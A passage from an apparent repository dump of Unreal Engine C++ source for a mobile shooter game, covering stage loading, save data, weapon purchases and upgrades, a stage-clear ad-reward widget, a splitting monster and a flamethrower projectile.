\"BlueScriptObject/Weapon/PG_Weapon.h\"\n\nAPG_GameModeBase::APG_GameModeBase()\n{\n\tm_pSavePlayerData = nullptr;\n\tm_pSelectSaveStageData = nullptr;\n\tPlayerStateClass = APG_MyPlayerState::StaticClass();\n\n\tPrimaryActorTick.bCanEverTick = true;\n}\n\nvoid APG_GameModeBase::PostLoad()\n{\n\tSuper::PostLoad();\n\n\n}\n\nvoid APG_GameModeBase::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tG_PGWorld = GetWorld();\n\n\t// 플레이어 세이브 데이터 로드\n\t{\n\t\tm_pSavePlayerData = LoadSavePlayerData();\n\t\tABCHECK(nullptr != m_pSavePlayerData);\n\t}\n\n\tm_nPalyStageID = m_pSavePlayerData->m_nLastPlayStageID;\n\tif (0 == m_pSavePlayerData->m_nLastPlayStageID)\n\t\tm_nPalyStageID = 1;\n\n\t// 기본 스테이지 선택하기\n\t{\n\t\tm_pSelectSaveStageData = LoadSaveStageData(m_nPalyStageID);\n\t\tABCHECK(nullptr != m_pSelectSaveStageData);\n\t}\n}\n\nvoid APG_GameModeBase::PostLogin(APlayerController* NewPlayer)\n{\n\tSuper::PostLogin(NewPlayer);\n}\n\nvoid APG_GameModeBase::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\nvoid APG_GameModeBase::BeginDestroy()\n{\n\tG_PGWorld = nullptr;\n\tSuper::BeginDestroy();\n}\n\nvoid APG_GameModeBase::Tick(float DeltaTime)\n{\n\tUpdateGameInstance(DeltaTime);\n\tSuper::Tick(DeltaTime);\n}\n\nbool APG_GameModeBase::StartGame()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tABCHECK(pGameInstance->GetTableStageData(m_nPalyStageID), false);\n\n\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeBase, false);\n\n\tauto pSavePlayerData = GetSavePlayerData();\n\tABCHECK(nullptr != pSavePlayerData, false);\n\n\tpSavePlayerData->m_nLastPlayStageID = m_nPalyStageID;\n\tSavePlayerData();\n\n\tFString NextStageName = pGameInstance->GetStageName(m_nPalyStageID);\n\t//FString DebugMsg = FString::Printf(TEXT(\"Play Stage : %s\"), *NextStageName);\n\t//GEngine->AddOnScreenDebugMessage(-1, 3.0f, FColor::Red, DebugMsg);\n\n\tUGameplayStatics::OpenLevel(GetWorld(), *NextStageName);\n\n\treturn true;\n}\n\nvoid APG_GameModeBase::StartGame_NextStage()\n{\n\tm_nPalyStageID++;\n\tStartGame();\n}\n\nvoid APG_GameModeBase::RestartGame()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tFString RestartStageName = pGameInstance->GetStageName(m_nPalyStageID);\n\t//FString DebugMsg = FString::Printf(TEXT(\"Stage Restart : %s\"), *RestartStageName);\n\t//GEngine->AddOnScreenDebugMessage(-1, 3.0f, FColor::Yellow, DebugMsg);\n\n\tUGameplayStatics::OpenLevel(GetWorld(), *RestartStageName);\n}\n\nbool APG_GameModeBase::SetNextStageID()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tint32 nNextStage = m_nPalyStageID + 1;\n\n\tif (pGameInstance->GetTableStageData(nNextStage))\n\t{\n\t\tint32 nBackupPlayStageID = m_nPalyStageID;\n\t\tm_nPalyStageID = nNextStage;\n\n\t\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\t\tABCHECK(nullptr != pGameModeBase, false);\n\n\t\tif (false == pGameModeBase->SetSelectSaveStageData(m_nPalyStageID))\n\t\t{\n\t\t\tm_nPalyStageID = nBackupPlayStageID;\n\t\t\treturn false;\n\t\t}\n\n\t\treturn true;\n\t}\n\n\treturn false;\n}\n\nbool APG_GameModeBase::SetPrevStageID()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tint32 nPrevStage = m_nPalyStageID - 1;\n\n\tif (pGameInstance->GetTableStageData(nPrevStage))\n\t{\n\t\tint32 nBackupPlayStageID = m_nPalyStageID;\n\t\tm_nPalyStageID = nPrevStage;\n\n\t\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\t\tABCHECK(nullptr != pGameModeBase, false);\n\n\t\tif (false == pGameModeBase->SetSelectSaveStageData(m_nPalyStageID))\n\t\t{\n\t\t\tm_nPalyStageID = nBackupPlayStageID;\n\t\t\treturn false;\n\t\t}\n\n\t\treturn true;\n\t}\n\n\treturn false;\n}\n\nbool APG_GameModeBase::SetPlayStageID(int32 nPlayStageID)\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\tABCHECK(pGameInstance->GetTableStageData(nPlayStageID), false);\n\n\tm_nPalyStageID = nPlayStageID;\n\treturn true;\n}\n\nbool APG_GameModeBase::SetSelectSaveStageData(int32 a_nStageID)\n{\n\tm_pSelectSaveStageData = LoadSaveStageData(a_nStageID);\n\treturn (nullptr != m_pSelectSaveStageData);\n}\n\nbool APG_GameModeBase::IsFirstPlayStage(int32 a_nStageID)\n{\n\tauto pSaveStageData = Cast<UPG_SaveStageData>(UGameplayStatics::LoadGameFromSlot(UPG_SaveStageData::GetSlotName(a_nStageID), UPG_SaveStageData::GetPlayerIndex()));\n\treturn (nullptr == pSaveStageData);\n}\n\nbool APG_GameModeBase::IsUnlockWeapon(int32 a_nWeaponIndex)\n{\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\n\tauto WeaponOwnData = m_pSavePlayerData->WeaponOwnData.Find(a_nWeaponIndex);\n\tif (nullptr == WeaponOwnData)\n\t\treturn false;\n\n\treturn WeaponOwnData->IsUnlock;\n}\n\nbool APG_GameModeBase::IsMaxLevelPower(int32 a_nWeaponIndex)\n{\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\tauto WeaponOwnData = m_pSavePlayerData->WeaponOwnData.Find(a_nWeaponIndex);\n\tif (nullptr == WeaponOwnData)\n\t\treturn false;\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\t// Max Level 체크\n\tint32 nPower = m_pSavePlayerData->WeaponOwnData[a_nWeaponIndex].PowerLevel * pWeaponTableData->WeaponData.PowerUpPerLevelUp;\n\treturn (nPower >= pWeaponTableData->WeaponData.MaxPower);\n}\n\nbool APG_GameModeBase::IsMaxLevelAmmo(int32 a_nWeaponIndex)\n{\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\tauto WeaponOwnData = m_pSavePlayerData->WeaponOwnData.Find(a_nWeaponIndex);\n\tif (nullptr == WeaponOwnData)\n\t\treturn false;\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\t// Max Level 체크\n\tint32 nMag = m_pSavePlayerData->WeaponOwnData[a_nWeaponIndex].MagLevel * pWeaponTableData->WeaponData.MagUpPerLevelUp;\n\treturn (nMag >= pWeaponTableData->WeaponData.MaxMag);\n}\n\nbool APG_GameModeBase::IsAbleBuyRewardPointPower(int32 a_nWeaponIndex)\n{\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\tauto WeaponOwnData = m_pSavePlayerData->WeaponOwnData.Find(a_nWeaponIndex);\n\tif (nullptr == WeaponOwnData)\n\t\treturn false;\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\treturn (m_pSavePlayerData->m_nRewardPoint >= pWeaponTableData->CostUpgradePower);\n}\n\nbool APG_GameModeBase::IsAbleBuyRewardPointAmmo(int32 a_nWeaponIndex)\n{\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\tauto WeaponOwnData = m_pSavePlayerData->WeaponOwnData.Find(a_nWeaponIndex);\n\tif (nullptr == WeaponOwnData)\n\t\treturn false;\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\treturn (m_pSavePlayerData->m_nRewardPoint >= pWeaponTableData->CostUpgradeAmmo);\n}\n\nbool APG_GameModeBase::BuyWeapon(int32 a_nWeaponIndex)\n{\n\tm_kLastBuyErrorMsg.Empty();\n\n\tif (IsUnlockWeapon(a_nWeaponIndex))\n\t{\n\t\tABLOG(Warning, TEXT(\"The weapon has already been released. (WeaponIndex : %d)\"), a_nWeaponIndex);\n\t\tm_kLastBuyErrorMsg = TEXT(\"The weapon has already been released.\");\n\t\treturn false;\n\t}\n\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\t// 포인트 체크\n\tif (m_pSavePlayerData->m_nRewardPoint < pWeaponTableData->CostUnlock)\n\t{\n\t\tABLOG(Warning, TEXT(\"Not enough reward point. (RewortPoint : %d / Cost : %d)\"), m_pSavePlayerData->m_nRewardPoint, pWeaponTableData->CostUnlock);\n\t\tm_kLastBuyErrorMsg = TEXT(\"Not enough reward point.\");\n\t\treturn false;\n\t}\n\n\tauto WeaponOwnData = m_pSavePlayerData->WeaponOwnData.Find(a_nWeaponIndex);\n\tif (nullptr == WeaponOwnData)\n\t{\n\t\tFPGWeaponOwnData kDefalutWeaponOwnData;\n\t\tkDefalutWeaponOwnData.IsUnlock = true;\n\t\tkDefalutWeaponOwnData.MagLevel = 1;\n\t\tkDefalutWeaponOwnData.PowerLevel = 1;\n\t\tm_pSavePlayerData->WeaponOwnData.Add(a_nWeaponIndex, kDefalutWeaponOwnData);\n\t}\n\telse\n\t{\n\t\tWeaponOwnData->IsUnlock = true;\n\t}\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState, false);\n\n\tif (false == SavePlayerData())\n\t{\n\t\tm_kLastBuyErrorMsg = TEXT(\"Data Save Error!\");\n\t\tABCHECK(false, false);\n\t}\n\n\tm_pSavePlayerData->m_nRewardPoint -= pWeaponTableData->CostUnlock;\n\n\tif (false == pMyPlayerState->InitPlayerData())\n\t{\n\t\tm_kLastBuyErrorMsg = TEXT(\"InitPlayerData Error\");\n\t\tABCHECK(false, false);\n\t}\n\n\treturn true;\n}\n\nbool APG_GameModeBase::BuyPowerUp(int32 a_nWeaponIndex)\n{\n\tm_kLastBuyErrorMsg.Empty();\n\n\tif (false == IsUnlockWeapon(a_nWeaponIndex))\n\t{\n\t\tABLOG(Warning, TEXT(\"You have not purchased a weapon. (WeaponIndex : %d)\"), a_nWeaponIndex);\n\t\tm_kLastBuyErrorMsg = TEXT(\"You have not purchased a weapon.\");\n\t\treturn false;\n\t}\n\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\t// 포인트 체크\n\tif (false == IsAbleBuyRewardPointPower(a_nWeaponIndex))\n\t{\n\t\tABLOG(Warning, TEXT(\"Not enough reward point. (RewortPoint : %d / Cost : %d)\"), m_pSavePlayerData->m_nRewardPoint, pWeaponTableData->CostUpgradePower);\n\t\tm_kLastBuyErrorMsg = TEXT(\"Not enough reward point.\");\n\t\treturn false;\n\t}\n\n\t// Max Level 체크\n\tif (IsMaxLevelPower(a_nWeaponIndex))\n\t{\n\t\tm_kLastBuyErrorMsg = TEXT(\"Max Level\");\n\t\treturn false;\n\t}\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState, false);\n\n\tm_pSavePlayerData->m_nRewardPoint -= pWeaponTableData->CostUpgradePower;\n\tm_pSavePlayerData->WeaponOwnData[a_nWeaponIndex].PowerLevel += 1;\n\n\tif (false == SavePlayerData())\n\t{\n\t\tm_kLastBuyErrorMsg = TEXT(\"Data Save Error!\");\n\t\tABCHECK(false, false);\n\t}\n\n\tif (false == pMyPlayerState->InitPlayerData())\n\t{\n\t\tm_kLastBuyErrorMsg = TEXT(\"InitPlayerData Error\");\n\t\tABCHECK(false, false);\n\t}\n\n\treturn true;\n}\n\nbool APG_GameModeBase::BuyAmmoUp(int32 a_nWeaponIndex)\n{\n\tm_kLastBuyErrorMsg.Empty();\n\n\tif (false == IsUnlockWeapon(a_nWeaponIndex))\n\t{\n\t\tABLOG(Warning, TEXT(\"You have not purchased a weapon. (WeaponIndex : %d)\"), a_nWeaponIndex);\n\t\tm_kLastBuyErrorMsg = TEXT(\"You have not purchased a weapon.\");\n\t\treturn false;\n\t}\n\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\t// 포인트 체크\n\tif (false == IsAbleBuyRewardPointAmmo(a_nWeaponIndex))\n\t{\n\t\tABLOG(Warning, TEXT(\"Not enough money. (RewortPoint : %d / Cost : %d)\"), m_pSavePlayerData->m_nRewardPoint, pWeaponTableData->CostUpgradeAmmo);\n\t\tm_kLastBuyErrorMsg = TEXT(\"Not enough reward point.\");\n\t\treturn false;\n\t}\n\n\t// Max Level 체크\n\tif (IsMaxLevelAmmo(a_nWeaponIndex))\n\t{\n\t\tm_kLastBuyErrorMsg = TEXT(\"Max Level\");\n\t\treturn false;\n\t}\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState, false);\n\n\tm_pSavePlayerData->m_nRewardPoint -= pWeaponTableData->CostUpgradeAmmo;\n\tm_pSavePlayerData->WeaponOwnData[a_nWeaponIndex].MagLevel += 1;\n\n\tif (false == SavePlayerData())\n\t{\n\t\tm_kLastBuyErrorMsg = TEXT(\"Data Save Error!\");\n\t\tABCHECK(false, false);\n\t}\n\n\tif (false == pMyPlayerState->InitPlayerData())\n\t{\n\t\tm_kLastBuyErrorMsg = TEXT(\"InitPlayerData Error\");\n\t\tABCHECK(false, false);\n\t}\n\n\treturn true;\n}\n\nFString APG_GameModeBase::GetLastBuyErrorMsg()\n{\n\treturn m_kLastBuyErrorMsg;\n}\n\nint32 APG_GameModeBase::GetMaxPower(int32 a_nWeaponIndex)\n{\n\tABCHECK(nullptr != m_pSavePlayerData, 0);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, 0);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(a_nWeaponIndex);\n\tif (nullptr == pWeaponTableData)\n\t{\n\t\tABLOG(Warning, TEXT(\"%d\"), a_nWeaponIndex);\n\t}\n\tABCHECK(nullptr != pWeaponTableData, 0);\n\n\tauto pWeaponOwnData = m_pSavePlayerData->WeaponOwnData.Find(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponOwnData, 0);\n\n\treturn pWeaponTableData->WeaponData.BPower + ((pWeaponOwnData->PowerLevel - 1) * pWeaponTableData->WeaponData.PowerUpPerLevelUp);\n}\n\nint32 APG_GameModeBase::GetMaxAmmo(int32 a_nWeaponIndex)\n{\n\tABCHECK(nullptr != m_pSavePlayerData, 0);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, 0);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponTableData, 0);\n\n\tif (0 > pWeaponTableData->WeaponData.Mag)\n\t{\n\t\t// 총알 무한 발사의 의미\n\t\treturn PG_INFINITY_AMMO;\n\t}\n\n\tauto pWeaponOwnData = m_pSavePlayerData->WeaponOwnData.Find(a_nWeaponIndex);\n\tABCHECK(nullptr != pWeaponOwnData, 0);\n\n\treturn pWeaponTableData->WeaponData.Mag + ((pWeaponOwnData->MagLevel - 1) * pWeaponTableData->WeaponData.MagUpPerLevelUp);\n}\n\nUPG_SavePlayerData*\tAPG_GameModeBase::LoadSavePlayerData()\n{\n\tauto pSavePlayerData = Cast<UPG_SavePlayerData>(UGameplayStatics::LoadGameFromSlot(UPG_SavePlayerData::GetSlotName(), UPG_SavePlayerData::GetPlayerIndex()));\n\tif (nullptr == pSavePlayerData)\n\t\tpSavePlayerData = Cast<UPG_SavePlayerData>(UGameplayStatics::CreateSaveGameObject(UPG_SavePlayerData::StaticClass()));\n\n\treturn pSavePlayerData;\n}\n\nbool APG_GameModeBase::SavePlayerData()\n{\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\n\tif (false == UGameplayStatics::SaveGameToSlot(m_pSavePlayerData, UPG_SavePlayerData::GetSlotName(), UPG_SavePlayerData::GetPlayerIndex()))\n\t{\n\t\tABLOG(Error, TEXT(\"Data Save Error!\"));\n\t\treturn false;\n\t}\n\n\treturn true;\n}\n\nUPG_SaveStageData*\tAPG_GameModeBase::LoadSaveStageData(int32 nStageID)\n{\n\tauto pSaveStageData = Cast<UPG_SaveStageData>(UGameplayStatics::LoadGameFromSlot(UPG_SaveStageData::GetSlotName(nStageID), UPG_SaveStageData::GetPlayerIndex()));\n\tif (nullptr == pSaveStageData)\n\t{\n\t\tpSaveStageData = Cast<UPG_SaveStageData>(UGameplayStatics::CreateSaveGameObject(UPG_SaveStageData::StaticClass()));\n\t\tpSaveStageData->m_nStageID = nStageID;\n\t}\n\n\treturn pSaveStageData;\n}\n\n\nbool APG_GameModeBase::SaveStageData()\n{\n\tABCHECK(nullptr != m_pSelectSaveStageData, false);\n\n\tif (false == UGameplayStatics::SaveGameToSlot(m_pSelectSaveStageData, UPG_SaveStageData::GetSlotName(m_pSelectSaveStageData->m_nStageID), UPG_SaveStageData::GetPlayerIndex()))\n\t{\n\t\tABLOG(Error, TEXT(\"Data Save Error!\"));\n\t\treturn false;\n\t}\n\n\treturn true;\n}\n\nvoid APG_GameModeBase::UpdateGameInstance(float DeltaTime)\n{\n\t// 게임 플레이 스테이지 모드에서만 처리할 수 있는 콘솔 커맨드\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tpGameInstance->FromGameModeTick(DeltaTime);\n}" }, { "alpha_fraction": 0.697516143321991, "alphanum_fraction": 0.7039809226989746, "avg_line_length": 25.718181610107422, "blob_id": "15c54eb8e697a590793bfeb315c1a60fa81c25cd", "content_id": "9cf2069e49f3d7236cdb2f0dbf6242b0f4d76ebd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3153, "license_type": "no_license", "max_line_length": 95, "num_lines": 110, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetStageClear.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetStageClear.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetStageClear : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\tvirtual void NativeTick(const FGeometry& MyGeometry, float DeltaTime) override;\n\npublic :\n\t// 스테이지 플레이 광고 재생 가능한지 검사\n\tUFUNCTION(BlueprintCallable)\n\tbool IsAbleViewStagePlayAD();\n\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateClearStageLayout();\n\npublic :\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnRetry();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnGoToMainLobby();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnNextStage();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnViewAD();\n\n\t//============================================================================================\n\t// 광고 시청에 대한 결과\n\t//============================================================================================\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADRewardVideoSucessed();\t\t// 유저가 보상형 광고를 성공적으로 보았음 (3배 보상)\n\tUFUNCTION(BlueprintCallable)\t\n\tvoid OnADRewardVideoClosed();\t\t// 유저가 보상형 광고 보는중 닫거나 실패하였음\t(3배 보상)\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADPlayStageVideoSucessed();\t// 스테이지 플레이형 광고를 성공적으로 보았음\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADPlayStageVideoClosed();\t// 스테이지 플레이형 광고를 닫거나 실패하였음\n\t//============================================================================================\n\n\tUFUNCTION()\n\tvoid OnViewResultAD(bool bEnable);\n\nprivate:\n\tvoid SetBonusFlag(bool bWasClear, int32 nBonus);\n\tvoid SetBonusLethal(bool bWasClear, int32 nBonus);\n\tvoid SetBonusTime(bool bWasClear, int32 nBonus);\n\tvoid SetBonusStageClear(int32 nStageClearBonus);\n\tvoid SetBonusMonsterKill(int32 nMonsterKillBonus);\n\tvoid SetBonusStar(int32 nStarBonus);\n\tvoid SetBonusAD(bool bEnable);\n\tvoid SetBtnBonusADTime(int32 nTime);\n\tvoid SetBtnEnableAD(bool bEnable);\n\tvoid SetTotalReward(int32 nTotalReward);\n\nprivate :\n\tUPROPERTY()\n\tclass UOverlay* Overlay_ActiveFlag;\n\tUPROPERTY()\n\tclass UOverlay* Overlay_DeActiveFlag;\n\n\tUPROPERTY()\n\tclass UOverlay* Overlay_ActiveTime;\n\tUPROPERTY()\n\tclass UOverlay* Overlay_DeActiveTime;\n\n\tUPROPERTY()\n\tclass UOverlay* Overlay_ActiveLethal;\n\tUPROPERTY()\n\tclass UOverlay* Overlay_DeActiveLethal;\n\n\tUPROPERTY()\n\tclass UTextBlock* Text_BonusFlag;\n\tUPROPERTY()\n\tclass UTextBlock* Text_BonusLethal;\n\tUPROPERTY()\n\tclass UTextBlock* Text_BonusTime;\n\t\n\tUPROPERTY()\n\tclass UTextBlock* Text_BonusStageClear;\n\tUPROPERTY()\n\tclass UTextBlock* Text_BonusKill;\n\tUPROPERTY()\n\tclass UTextBlock* Text_BonusStar;\n\tUPROPERTY()\n\tclass UTextBlock* Text_CaptionBonusAD;\n\tUPROPERTY()\n\tclass UTextBlock* Text_BonusAD;\n\tUPROPERTY()\n\tclass UTextBlock* Text_ClearADTimer;\n\tUPROPERTY()\n\tclass UTextBlock* Text_TotalReward;\n\n\tUPROPERTY()\n\tclass UButton* m_pBtn_ViewAD;\n\n\tbool m_bWasViewStageClear3X = false;\n};\n" }, { "alpha_fraction": 0.7633587718009949, "alphanum_fraction": 0.7664121985435486, "avg_line_length": 26.29166603088379, "blob_id": "77bf9a57065daed0a5698989ce3052dd01869e14", "content_id": "2101752daecf77c1d9cdda8814b29a488882967e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1446, "license_type": "no_license", "max_line_length": 109, "num_lines": 48, "path": "/Source/Project_Gun/Public/Character/PG_MonCharDivision.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include \"PG_MonCharDivision.generated.h\"\n\n/**\n *\n */\nUCLASS()\nclass PROJECT_GUN_API APG_MonCharDivision : public APG_MonChar\n{\n\tGENERATED_BODY()\n\npublic:\n\tAPG_MonCharDivision();\n\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\npublic:\n\tbool\tIsPossibleToDivision();\t\t\t\t// 분할 가능한지 검사\n\tbool\tIsDivisionChild();\t\t\t\t\t// 자식 여부 확인\n\n\tint32\tGetDivisionCountToHPRatio();\t\t// 현재 몬스터의 남은 체력 기준, 분할 할 수 있는 횟수를 반환한다.\n\t\n\tvoid\tSetMonsterDataDivision(FPGMonsterData_Division& MonsterData_Division);\n\tconst FPGMonsterData_Division* GetMonsterDataDivision() { return &MonsterDivisionData; }\n\npublic:\n\tvirtual bool OnDamage(int32 nDamage, bool IsUseLetharAttack = false) override;\n\n\t// 스폰되면 생성된 몬스터 액터가 호출된다.\n\tvoid OnSpawnActor(APG_MonCharDivision* ASpawnActor);\n\nprotected :\n\tUPROPERTY(VisibleAnywhere, Category = \"PG MonsterComponent\")\n\tclass UPG_ComponentDivisionSpawn* DivisionSpawnComponent;\n\n\tUPROPERTY(EditAnywhere, BlueprintReadWrite, Category = \"PG MonsterInfo\", Meta = (AllowPrivateAccess = true))\n\tstruct FPGMonsterData_Division MonsterDivisionData;\n\t\n\tUPROPERTY()\n\tbool m_bIsDivisionChild;\t// 분화형 몬스터의 자식 여부\n};\n" }, { "alpha_fraction": 0.7603423595428467, "alphanum_fraction": 0.7643366456031799, "avg_line_length": 26.606298446655273, "blob_id": "8d96d8d95efb71a1d357d77fffe8d48bcb4da058", "content_id": "a9d1f0a734abb2fd81a972692279cc10520a5d69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3689, "license_type": "no_license", "max_line_length": 204, "num_lines": 127, "path": "/Source/Project_Gun/Private/BlueScriptObject/Projectile/PG_ProjectileFlame.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/Projectile/PG_ProjectileFlame.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/PG_MyChar.h\"\n\nAPG_ProjectileFlame::APG_ProjectileFlame()\n{\n\tPrimaryActorTick.bCanEverTick = true;\n\n\tCollisionMeshComponent = CreateDefaultSubobject<UStaticMeshComponent>(TEXT(\"COLLISIONMESHCOMPONENT\"));\n\tCollisionMeshComponent->SetupAttachment(CollisionComponent);\n\tCollisionMeshComponent->OnComponentBeginOverlap.AddDynamic(this, &APG_ProjectileFlame::OnTargetBeginOverlap);\n}\n\nvoid APG_ProjectileFlame::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tABCHECK(nullptr != CollisionMeshComponent);\n\tCollisionMeshComponent->SetCollisionProfileName(TEXT(\"Projectile\"));\n\tCollisionMeshComponent->SetGenerateOverlapEvents(true);\n}\n\nvoid APG_ProjectileFlame::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n\tABCHECK(nullptr != CollisionMeshComponent);\n\tCollisionMeshComponent->SetVisibility(true);\n\tCollisionMeshComponent->SetRelativeScale3D(FVector(0.0f, 0.0f, 0.0f));\n}\n\nvoid APG_ProjectileFlame::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n\n\tUpdateCollisionScale(DeltaTime);\n}\n\nvoid APG_ProjectileFlame::UpdateCollisionScale(float DeltaTime)\n{\n\tif (CollisionMeshComponent)\n\t{\n\t\tm_fScaleTime += DeltaTime;\n\n\t\t// 화염방사기 범위가 완전히 펴질때까지의 목표시간\n\t\tfloat GoalSec = 1.0f;\n\t\tif (m_fScaleTime > GoalSec)\n\t\t\tm_fScaleTime = GoalSec;\n\n\t\tfloat fScale = (m_fScaleTime / GoalSec);\n\t\tFVector vScale(fScale, fScale, fScale);// = CollisionMeshComponent->GetComponentScale();\n\t\tCollisionMeshComponent->SetRelativeScale3D(vScale);\n\t}\n}\n\nvoid APG_ProjectileFlame::FireInDirection(const struct FPGWeaponData* pWeaponData, const FVector& ShootDirection, bool bMonsterWeapon)\n{\n\tABCHECK(nullptr != CollisionMeshComponent);\n\tWeaponData = *pWeaponData;\n\n\tFName CollisionName = bMonsterWeapon ? TEXT(\"Mon_Projectile\") : TEXT(\"Projectile\");\n\tif (CollisionMeshComponent)\n\t{\n\t\tCollisionMeshComponent->SetCollisionProfileName(CollisionName);\n\t}\n\n\tvStartPos = GetActorLocation();\n}\n\nvoid APG_ProjectileFlame::SetScaleTime(float fScaleTime)\n{\n\tm_fScaleTime = fScaleTime;\n\tUpdateCollisionScale(0.0f);\n}\n\nvoid APG_ProjectileFlame::OnTargetBeginOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& 